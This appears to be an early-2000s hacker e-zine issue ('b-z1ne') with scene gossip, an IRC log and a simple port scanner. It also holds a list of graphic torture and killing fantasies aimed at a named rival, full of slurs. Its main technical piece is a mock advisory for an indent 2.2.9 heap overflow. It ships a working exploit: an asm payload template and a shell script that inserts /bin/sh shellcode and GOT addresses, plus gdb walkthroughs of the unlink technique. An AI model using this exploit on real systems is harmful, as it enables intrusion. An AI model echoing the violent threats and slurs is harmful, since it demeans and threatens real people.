Copy Link
Add to Bookmark
Report
b-z1ne 05
¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
::ÆÆÆ[www.blackhat.cx]ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ::
____________
--)-----------|____________|
,' ,'
-)------======== ,' ____ ,'
`. `. ,' ,'__ ,'
`. `. ,' ,'
`. `._,'_______,'________________[ vol.2 <=> issue#2 ]
__________.____ _____ _________ ____ __.__________.___ _______ ___________
\______ \ | / _ \ \_ ___ \| |/ _______ /| |\ \ \_ _____/
| | _/ | / /_\ \/ \ \/| < / / | |/ | \ | __)_
| | \ |___/ | \___| | \__/ /__| | \_| \
|______ ________ ____|__ /\______ _____|__ __________\___\____|_______________/
\/ \/ \/ \/ \/ @blackhat.cx
.-"" |=========================== ______________ |---------------------------------
"-...l_______________________ | |' || |_]__ |
[`-.|__________ll_| |----- www.blackhat.cx --------
,' ,' `. `. | (c) The b-zine corp. |
,' ,' `. ____`. -------------------------------
-)---------======== `. `.____`.
__ `. `.
/ /\ `.________`.
_ / / \ --)-------------|___________|
,-- / /\/ / \ -,
| ,/ / \/ / |----> the table of contents
,---| \ \ / |---------------------------------------------------------------,
| `-- \ \ / -----' "Trying is the first step towards failure"
| `\`*_' - Homer J. Simpson
| \__________________________________________________________________________'
|
|:--+-- 0x01 -+Welcome -------------------------------------------------+-------------
|:--+-- > 1ntroduct1on
|:--+-- > About th4 b-z1ne st4ff
|:--+-- > cont4ct uz
|:--+-- > gr3etz && hatez
|:--+-- 0x02 -+Pr0ix Payback time --------------------------------------+-------------
|:--+-- > 10 reasons why pr0ix is a retard
|:--+-- > 10 things to d0 wit pr0ix
|:--+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+-------------
|:--+-- > from /home/shev
|:--+-- 0x04 -+b4d n3wz ------------------------------------------------+-------------
|:--+-- > 1nd3x
|:--+-- > d1v1n31nt wh1t3h4t
|:--+-- 0x05 -+Art1cl3z ------------------------------------------------+-------------
|:--+-- > Winnie The Pooh Hacking Squadron
|:--+-- > 4nd th3 g00d13
|:--+-- 0x06 -+Thank you and good bye ----------------------------------+-------------
|:--+-- > outro
`-------------------------------------------------------------------------------------'
::ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ[www.blackhat.cx]ÆÆÆ::
--+-- 0x01 -+Welcome --------------------------------------+--------------------------
> 1ntroduct1on [By: uNkl m0lti13hm0r]
Hi im uNkl m0lti13hm0r and im the poor jew that fell for lkm's
'ill-let-you-touch-my-penis-if-you-write-all-the-boring-stuff-for-my-ezine'-trick.
Few wanted to write something for our magazine... well actually many, but we dont
want any more of sinister's ghey cookie recipes now do we? :<
well... after a wh0le lotta crap, we finally got this god-damn thing ready!@$#...
unfortunately i have some sad newz before you start reading this orgasmic collection
of eleiht2tehmaximewm-ezine .....
this will be the last issue of the black-hat zine ever.
im sorry, but we are basically to damn lazy. we've had plenty of nice texts
(EXCLUDING EVERYTHING THAT SINISTER MADE) in the latest zines, and we are
going to try to make this one the zine you will remember us for.
now i wont bore you anymore, read on...
yours sincerely, uNk0L m0LtiEhm0rrrrr.
> About th4 b-z1ne st4ff [By: st4ff]
[ lkm - igl00 m4zter from the v0lc4n0 island ]
[ sp4c3 c0wb0y - MENTALLY DAMAGED BY HITLERS SHOWERS ]
[ uNkl m0lti13hm0r - teh h1mc0k3 wreckage ]
[ doktur an0nymou$ - y0 y0u d0nt kn0w him f0 sh0! ]
[ schwartzn1gg3r - t3h b1tch fr0m w3zt s1de LA ]
> cont4ct uz
> gr3etz && hatez
--+-- 0x02 -+Pr0ix Payback time --------------------------------------+---------------
> 10 reasons why pr0ix is a retard [By: uNkl m0lti13hm0r]
hi! i assume you all have heard of the publiq enemy pr0ikz/whatever.
pr0ix is a dumb #dorknet/hack.cock.zad/ whatever niger who likes to fuck dead animals.
teh blakhats h8 pr0ix because:
#1 - Pr0ix is gay, and he will try to have sex with you in your ass if you even pretend to be his friend.
#2 - Pr0ix leeches exploitz to g0vb0i who immediately uploadz 2 hack.co.za with some lame php script he got on
the web 5 secs b4 he emails it to ofir@securityfocus.com. luckily, pr0ix+govb0i r so fucking stupid they
cant even paste an email witout spelling errorz so none of the emails ever gets thru.
#3 - pr0ix is fat and dreamz about joining the romanian xf0rze.
#4 - <pr0ix:#darknet> hey dvdman lets packet the phc some more!@!@!@
#5 - <pr0ix:#darknet> yo guys i finally got rpc-dcom autorooter to execute correctly!
#6 - pr0ix teeth+armpits smellz worse then divineint's defecation
#7 - pr0ix gave a blowjob 2 dianora 4 sp00f
#8 - pr0ix sweat smell funny :<
#9 - his nick has a number in it
#10 - he's italian
> 10 things to d0 wit pr0ix [By: uNkl m0lti13hm0r]
#1 - make a monkey with the ebola virus bite pr0ix dick off and then he will sit in there and bleed without
f00d or water for a week or two while waiting for the death of the virus. if he bleedz to fast we'll just
giv him a blood transfer.
#2 - we cud take a giljotine and ch0p off hiz fingers/c0q/toez and leave him in a smaaaalll room, and wait for
the blood go up so much he could swim in it, then we shoot him in his fuqing kneecap wit a shotgun and
watch him drown in his own blood wit the videocameraz we mount in the room\
#3 - we take a chainsaw and stick it down his fuqn throat and watch his whole body get sawed in a 100 piecez
while the ch41ns4w goesz all crazy
#4 - slit his m0thafukn throat wit an openbsd cd then send the cd back to theo,
asking for a refund and watch theo get HIV
#5 - lock him in a room and play h4ppy tr3e fri3nds songs all nights and wait till cleavez his own skull wit
the axe we accidentally leave in the room
#6 - we pour around 50 litres of nap4lm on him and throw cigarettez on him
#7 - we d0 it the 0ld skewl way: we hang him on the streetz
(after about 5 hourz wit stun gun electrocution+chinese torture of courze)
#8 - we hammer his ballz with a b4d4zz sledgehamm0r and then we pour VX gas down his throat and
watch his skin melt, and then we laugh as he spits up hiz own fuqn guts HEH
#9 - we take a rope around his non existant c0q and the other end after a car..
w3 start the car and drag him after making his hole skin get burnt off..
if hes still alive we beat his fuqin head in wit an aliminium baseball bat
#10 - gather 200 blaqh@z and make them all shit down pr0ixz throat untill he dies 2
--+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+---------------
> from /home/shev
y0 look @ th4t sc0ttish sk1llz
-bash-2.05b$ cat diss.c
/*
diss.c by shev
/alias diss { exec -o ~/code/diss -d }
/alias uberdiss { exec -o ~/code/diss -u }
/alias counterdiss { exec -o ~/code/diss -c }
wh00hahshit! - #jEWcREW dissware
dedicated to leet.c, because it's a legend
*/
#include <stdlib.h>
#include <stdio.h>
int
main(int argc, char **argv)
{
char c;
while((c = getopt(argc, argv, "duchebag"), 0x00) != -1) {
switch(c) {
case 'd': //diss
printf( "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n");
break;
case 'u': //ubderdiss
printf( "\e[1;33mU \e[1;32mB \e[1;31mE \e[1;36mR \e[35m- "
"\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n");
break;
case 'c': //counterdiss
printf( "\e[1;33mC \e[1;32mO \e[1;31mU \e[1;36mN \e[1;33mT \e[1;32mE \e[1;31mR \e[1;36m- "
"\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n");
break;
case 'h':
usage();
default:
usage();
}
break;
}
exit(0);
}
int
usage()
{
fprintf(stderr, "diss.c v0.1 by shev\n"
"Usage: ./diss [OPTION]\n"
"* -d:\tdiss!\n"
"* -u:\tuberdiss!\n"
"* -c:\tcounterdiss!\n"
"* -h:\tthis help!\n");
exit(1);
}
-bash-2.05b$ cat shevscan.c
/*
A simple TCP portscanner
By shev [shev@somehost.org] [1999] // shev, somehost.org was not reg'd until the year 2002!
Shouts to #mafia / #phsc // are you trying to make out you've been coding for 4 years ?:|
*/
#include <stdio.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#define MAXPORT 1024
int main(int argc, char **argv)
{
int i,
MAX,
sock;
struct sockaddr_in adr_inet;
struct servent *port;
struct hostent *ip;
printf( "-----------------------------\n"
"| TCP portscanner |\n"
"| by shev [shev@somehost.com] |\n"
"-----------------------------\n",
argv[0]);
if (argc < 2)
{
fprintf(stderr, "Usage: %s <host> [MAX PORT]\n", argv[0]);
exit(EXIT_FAILURE);
}
if (argv[2] != 0x0)
{
MAX=atoi(argv[2]);
}
else
{
MAX=MAXPORT;
}
ip = gethostbyname (argv[1]);
if(!ip)
{
printf("error: could not resolve hostname.\n");
exit(EXIT_FAILURE);
}
printf( "\nscanning:\t%s\n"
"maxport:\t%d\n\n"
"results:\n"
"\t\tport\tservice\n",
argv[1], MAX);
bzero(&adr_inet,sizeof(adr_inet));
adr_inet.sin_family = AF_INET;
bcopy (ip->h_addr, (char *) &adr_inet.sin_addr, ip->h_length);
for(i = 0; i < MAX; i++)
{
if (( sock = socket(AF_INET,SOCK_STREAM,0) ) < 0 )
{
perror("socket() ");
exit(1);
}
adr_inet.sin_port = htons(i);
if (connect(sock,(struct sockaddr *) &adr_inet,sizeof(adr_inet)) == 0)
{
port = getservbyport(ntohs(i), "tcp");
if(port != NULL)
printf("\t\t%d\t%s\n", i, port->s_name);
if (port == NULL)
printf("\t\t%d\tUNDETERMINED\n", i);
}
close(sock);
}
printf("\nScanning finished!\n");
}
-bash-2.05b$
--+-- 0x04 -+ b4d n3wz -----------------------------------------------+---------------
> H34dl1n3z [By: doktur an0nymou$ && schwartzn1gg3r ]
Ac00rd1ng to: doktur an0nymou$
<-> ducer the polish hacker lost his ircs account for smbclienting half of the
world from ircs shell servers. <->
Ac00rd1ng to: doktur an0nymou$
<-> ADM is getting even more active, prepare for a takeover !@# <->
Ac00rd1ng to: doktur an0nymou$
<-> shiftee the retired hacker (ircer now), lost his access to logos.relcom.ru
by the cause of cracking too much channel keys with his script <->
Ac00rd1ng to: doktur an0nymou$
<-> sionide learnt how to drive a go-cart roflol <->
Ac00rd1ng to: doktur an0nymou$
<-> pr0ix the prince of pranks, now has access to CHANFIX database and already
took over a lot big channels, wonder when ircops gonna realise that his a
scumbag <->
Ac00rd1ng to: doktur an0nymou$
<-> halvar and calvados are now officially girlfriendqs for being
able to drink themselves under the floor, even tho calvados also
loves ParaBytes, who schooled him on win32asm <->
Ac00rd1ng to: doktur an0nymou$
<-> zip of #mafia got caught for hacking wait3rs #darknet access in
the botnet. his hdd is now completely full with messages like
"h4ck.c0.z4 0wnz u l1l f00l" <->
Ac00rd1ng to: doktur an0nymou$
<-> north_ now has the worlds ever sucky sendmail exploit <->
Ac00rd1ng to: doktur an0nymou$
<-> the fluffy bunny is back online, prepare for newer defaces
(pH33R) <->
Ac00rd1ng to: doktur an0nymou$
<-> om the israeli hacker (not yet a kiddie actually) is trying to
hack a NATed box via its gateways, he already tried mission hackit
with nmap, but had no luck yet <->
Ac00rd1ng to: schwartzn1gg3r
<-> DaStand is happy now.. he recently goes out drinking with his
hacker friends (scrippie, jj, etc). they gave him a
so-sophisticated-looking-like exploit, he tried to compile but it
took him 3 days to fix and compile, after that he is reinstallnig
his home box. 4nd now he is the infamous phC h4cker sky- s0 w4tch out
for pHC-k3nny.c <->
Ac00rd1ng to: doktur an0nymou$
<-> americas (in!)famous hacker (dumbass fuck) PEN is now ddosing
his friends for no reason. Actions mirroring his skills are like
he is not able stop his floodnet once he started it. <-> 1
> d1v1n31nt wh1t3h4t [by: schwartzn1gg3r]
08:39 -!- aprodite [-aprodite@0xbadc0ded.org] has joined #blackhat
08:40 < aprodite> sup guys
08:40 <@censored> nothing important whitehat-boy
08:41 <@censored> hmm
08:41 <@censored> :P
08:43 < aprodite> haha whitehat b0y
08:43 < aprodite> =]
08:44 < aprodite> suo mcbethy long time no see/type
08:44 <@censored> :)
08:44 <@censored> i know you under other handle ?
-aprodite@0xbadc0ded.org (stealth)
08:44 -!- Irssi: Starting query in stealth with aprodite
08:44 <aprodite> been ages...sup?
08:44 <aprodite> u know who i am rite
08:44 <censored> not really
08:44 <aprodite> o
08:45 <aprodite> divineint =]
08:45 <censored> oh
08:45 <censored> so you are whitehat now ?
08:45 <censored> 0xbadc0ded.org is whitehat group
08:45 <aprodite> obviously not why?
08:45 <aprodite> oh
08:45 <aprodite> l'm still pure black of course
08:45 <aprodite> hhehee
08:46 <aprodite> u don't get much darker
08:46 <aprodite> hehe
08:46 <censored> you are badc0ded.org member now ?
08:46 <aprodite> neh
08:46 <aprodite> just got a shell no bigge =]
08:47 <aprodite> y what have u against them?
08:47 <censored> not much.. i just hate them :P
08:47 <aprodite> hahahaa
08:47 <aprodite> funky =]
08:47 <aprodite> anyways their nice dudes if u get to knwot hem after a while
08:48 <censored> still trading on darknet ?
08:48 <aprodite> anyways quit bitching about my host :P
08:48 <aprodite> naturally
08:48 <censored> i hat your host
08:48 <aprodite> and many other places of course
08:48 <censored> hate
08:48 <aprodite> hehe
08:48 <aprodite> well get me a shell on phiral then
08:48 <aprodite> matrix runs it or what
08:49 <censored> yep
08:49 <aprodite> o
08:49 <aprodite> proably sniffs you long time =]
08:49 <aprodite> hhee
08:49 <censored> i don't care
08:49 <aprodite> o i would care
08:49 <aprodite> anyways so sup whats been going on
08:50 <censored> not much
08:50 <aprodite> haha i can't belive anyone accusing me of being whitehat hahehehe
08:50 <censored> coding & working
08:50 <aprodite> *lol*
08:50 <censored> 08:50 <censored> not much
08:50 <censored> 08:50 <aprodite> haha i can't belive anyone accusing me of being whitehat hahehehe
08:50 <censored> 08:50 <censored> coding & working
08:50 <censored> 08:50 <aprodite> *lol*
08:50 <aprodite> ah the usual sh1t eh
08:50 <censored> shit
08:51 <censored> :P
08:51 <aprodite> heh
08:51 <censored> wrong mouse move
08:51 <censored> :)
08:52 <censored> maybe you are not white
08:52 <censored> but badc0ded obviously is
08:52 <censored> badc0ded.org
08:53 <censored> wow
08:53 <censored> they have phiral.com in links section
08:53 <censored> :)
08:57 <@othercensored> re
08:57 <@othercensored> censored;]
08:57 <@censored> yo othercensored
08:57 <@censored> :)
08:57 <@othercensored> :>
08:58 <@censored> crucified
08:58 <@othercensored> ;]
08:59 <@othercensored> <pl>widze twoja twarz !! </pl>
08:59 <@othercensored> :D
08:59 <@censored> heh
09:00 <@othercensored> http://slashdot.org/article.pl?sid=00/12/22/0157229&mode=nocomment
09:00 <@othercensored> NSA linux;]
09:00 -!- aprodite [-aprodite@0xbadc0ded.org] has quit [BitchX-1.0c19 -- just do it.]
09:01 <@censored> hum
09:01 <@othercensored> hm
--+-- 0x05 -+ Art1cl3 ------------------------------------------------+---------------
> Winnie The Pooh Hacking Squadron [by: Winnie The Pooh Hacking Squadron]
XXXX
XX XX
XXXX XX XX
XXX XX XX XX
XX XX XXXX XX XX
XX XX XXXX XX
XX XX XXX XX
XX XX XXX XX
XX XXX XX
XX XXX
XX XX
XX XX
XXXX XX
XX XX
XX XX
XX X XX
XX XXX XX
XX XX XX
XXX XX XX
XXX XXXX XX
XXX XXX XX
XXX XXXX
XXX XXXXX
XX XXXXX
XX XXXX
XX XX XXX
XXXXXXXX X XX
XX.....XXXXX XX XX
XX.......XXXXXXX XX XX XX
XX............XXXXXXX XX XX XXX
XX..X..............XXXXXX XXXXXXXXXX
XXX....................XXXX XX
XX........................XXXX XXXXX
XX.............................XXXX..XX
XX.................................XX..XX
XX......................................XX
XXX.......................................XX
XXXX.........................................XX
XXX...................X........................XX
XXXXXXX...............X...........................XX
XX XXXX...........XX..........................XX
XX XXX.......XX............................XX
XX XXX...XX..............................XX
XX XXXX....XXXXXXXXXXXXXXXXXX..........XX
XX XXXXXXXX XXXXXXXXXXXXXX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX X XXX
XX XX XX XX
XX XX XX XX
XX XX XX XX
XX XX XX XX
XX XX XX XX
XX XX XX XX
XX XX X XX XX
XX XXX XX X XXXX XX
XXXX XX XX XX XX XXXXXX
XX XX XXX XX
XXXX XXX XX
XX XXX XX
XX XX XX
XX XX XX
XX XX XX
XXXX XX XX
XXX XX XX XXX
XX XX XX XXX
XX XX XXXXXXX
XX XX XXX XXX
XX XX XXX XXX XX
XX XXX XX XXX XX
XX XX XX XX XX
XX XXX XX XX XX XX
XX XXXXX XX XX XX XX
XX XX XX XXXX XX XX
XX X XX XXX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XXX XXX XX XXX
XXXXX XXX XXX
XXXXX
. . .___.. .__ .
| |*._ ._ * _ | |_ _ [__) _ _ |_
|/\||[ )[ )|(/, | [ )(/, | (_)(_)[ )
. . . __. .
|__| _. _.;_/*._ _ (__ _.. . _. _|._. _ ._
| |(_](_.| \|[ )(_] .__)(_](_|(_](_][ (_)[ )
._| |
.__ ,
[__)._. _ __ _ ._ -+- __ *
| [ (/,_) (/,[ ) | _) *
Software: indent
Version: 2.2.9
Vulnerability: buffer overflow while parsing .c file
Found date: Aug 2002
Release date: today you stupid whitehat boy
Researchers: Winnie The Pooh Hacking Squadron
Favourite food: whitehat soup
[0] LICENSE
1) No whitehat whore can use this in his pseudo-security work
2) divineint can't trade exploit attached to this advisory on
#darknet@efnet nor other lame channel (for people who don't
know it yet - his new nick is illumanti(z), is he hidding ?!)
3) Every hacker can implement exploit for this vuln in his
codes to protect them from script kiddies and whitehats.
4) WtPHS strongly encourage hackers to use this against
whitehats.
5) WtPHS don't give a shit if you hurt yourself
[1] INTRO
indent is really fucking leet tool that improves appearance
of C source code. It was designed to help people reading
sources written by damn stupid and unskilled programmers like
You Dong-Hun or Theo the Radt. It is really helpful nowadays
because of that whores who think they are coders. Unfortunatelly
authors of indent also made their software vulnerable to buffer
overflow.
[2] DETAILS
handle_token_colon(...) is vulnerable function. Buffer overflow
occurs while parsing text (from .c file of korz), which indent
treat like label. It copies whole 'label' to, 1000 bytes long,
buffer on heap, without bounds checking. (Note for divineint-alike
people: such overflow can lead to overwrite of heap stuctures and
as result of this - arbitrary code execution).
This is vulnerable part of handle_token_colon(...) function:
for (t_ptr = s_code; *t_ptr; ++t_ptr)
{
*e_lab++ = *t_ptr; /* turn everything so far into a label */
}
(Note for gorion(*)-alike people: this loop will copy as long as NULL
byte will be find in source string)
[3] EXPLOITATION
This section is needed for stupid people like divineint or Lorenzo
Hernandez Garcia-Hierro (Good Lord! I feel like in south-american
telenovel saing his name).
Smart people choose clear_buf_break_list() function to cause code
execution. This function is executed just after our vulnerable loop,
so we don't risk application crash. indent breaks source code and
makes double-linked list (buf_break_list) of code parts. Mentioned
function free()'s all buf_break_list entries.
This double-linked list entries are allocated after 'labbuf' (e_lab
points to labbuf) so we are able to overwrite it.
Now exploitation is very easy. Overwrite free() GOT entry with and
make clear_buf_break_list() loop run once again by setting 'prev'
field of buf_break_st_ty struct to some readable value.
Exploit for this vulnerability for indent 2.2.9 from slackware 9.0
is attached to this advisory.
NOTICE!!!! QUIZ FOR KIDDIES:
---------------------------------------------------------------------
This exploit have simple execve(shell) shellcode. What do you have to
change to make this exploit useful ?
---------------------------------------------------------------------
FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management
Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW!
[4] EDUCATIONAL VALUE
Whats educational here? One technique used in this exploit. Lets call
FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink()
will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT.
If we point WHAT to NOPs before our shellcode, unlink() will change
few of our NOPs to something else. Executing this 'somethingelse'
will probably crash our application. It looks like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: nop
0x805b44d: nop
0x805b44e: nop
0x805b44f: nop
0x805b450: nop
0x805b451: nop
0x805b452: nop
0x805b453: nop
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52
After unlink():
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: rorb $0x90,0x90900805(%ebp)
0x805b453: nop
0x805b454: nop
0x805b455: nop
0x805b456: nop
0x805b457: nop
0x805b458: nop
0x805b459: nop
Next call to free() will jump to 0x805b440. If execution flow will
reach 0x805b44c, program will crash at this instruction.
Solution is simple, however WtPHS don't remember anybody describing
it before, so ... here it is: Instead of NOPs you can use relative
jmp's like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: jmp 0x805b456
0x805b44e: jmp 0x805b458
0x805b450: jmp 0x805b45a
0x805b452: jmp 0x805b45c
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
After unlink():
(gdb) x/10i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: rorb $0xeb,0x8eb0805(%ebp)
0x805b453: or %ch,%bl
0x805b455: or %ch,%bl
0x805b457: or %ch,%bl
(gdb) x/10i 0x805b454
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
This way we jumped over shitty instruction. These jmps
will lead execution flow to our shellcode, but to be sure
that no jmp will jump into middle of shellcode you have
to put few (at least 8) NOPs before shellcode. Than last
jmp will jump to NOPs and than shellcode will be executed
properly.
[5] IMPACT
Possible impact is quite big. For example companies and software
developers that are terrified because of their software is damn
shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our
mind) could implement exploit for this vuln into their source
codes to make hackers life difficult.
[6] FLAMES, SHOUTOUTS and FINAL NOTES
*) no, divineint, you can't get our juarez - stop begging for it
biatch
*) no, Stefan Esser, you can't steal our juarez and public it
as your own, because you are to stupid to own us.
*) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron
*) shoutouts to PHC for terrorizing whitehats and full-disclosure
*) recent OpenSSH vulnerability is exploitable
*) greetings to Lorenzo Hernandes Garcia-Hierro for making us
laught on the floor while reading his posts.
*) kudos to Alan Alexander Milne (R.I.P - 1956)
[7] OUTRO
the end...
> 4nd th3 g00d13 [by: Winnie The Pooh Hacking Squadron]
$ cat winnie-template.c
int main(int argc, char **argv)
{
printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n"
"0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W
vU1n3r4b1l1ty\n");
asm
(
"nop\n"
"nop\n"
"nop\n"
"nop\n"
"nop\n"
"jmp continue\n"
".string
\"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n"
".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n"
"continue:\n"
"nop\n"
"nop\n"
:);
return 0;
}
$ cat prepare.sh
#!/bin/sh
# these addresses are working on indent 2.2.9 from
# slackware 9.0
# what_to_write
#
# it should be 2bytes aligned because it have to
# point to one of \xeb from jmps. If it points
# to \x08 - exploitation will fail
FD=`echo -e "\x40\xa4\x05\x08"`
# where_to_write-0x8
#
# it is good idea to point it to free() field in GOT
BK=`echo -e "\xc0\x7d\x05\x08"`
# change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes)
sed -e "s/JP/`echo -e \"\xeb\x08\"`/g" winnie-template.c > temp.c
# change all 'N' to \x90 (NOP)
sed -e "s/NNNNNNNNNNNNNNN/`echo -e
\"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\"`/"
temp.c > winnie.c
# change 'S's to shellcode
sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e
\"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh\"`/"
winnie.c > temp.c
# exploit with this shellcode is quite useless, because
# it is simple execve(shell) shellcode. If you want to
# change shellcode, first prepare winnie-template.c -
# change 'SSSS...' len to len of your new shellcode,
# but len of whole 'JP...NNN...SSS' should remain the same.
# You can remove few 'JP's. You have to leave few NOPs
# before shellcode, because one of jmp's will land in them
# (this is to be sure that no jmp will land in the middle
# of shellcode. When you changed template, change sed line
# above - change 'SSSS...' len and shellcode.
# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4)
sed -e "s/dddd/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c
sed -e "s/eeee/`echo -e \"\xfc\xff\xff\xff\"`/" winnie.c > temp.c
sed -e "s/ffff/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c
# change 'gggg' to FD (what_to_write)
sed -e "s/gggg/$FD/" winnie.c > temp.c
# change 'hhhh' to BK (where_to_write-8)
sed -e "s/hhhh/$BK/" temp.c > winnie.c
# 'iiii' is prev_size, but we don't need to change it
# Left it untouched
# change 'jjjj' to 0xfffffff1 (size field, pointing to these
# three (-4))
sed -e "s/jjjj/`echo -e \"\xf1\xff\xff\xff\"`/" winnie.c > temp.c
# change 'llll' to some readable value (on stack for example)
# it is 'next' field of overwritten buf_break_list struct
sed -e "s/llll/`echo -e \"\x40\xff\xff\xbf\"`/" temp.c > winnie.c
rm temp.c
$
--+-- 0x06 -+Thank you and good bye ----------------------------------+-------------
> outro [by: lkm]
Ok to make long story short, i've had enough of "irc" it's becoming useless 4 me atleast, so i'm just here
to say goodbye and i sure hope you all have good life!
Peace out
LKM
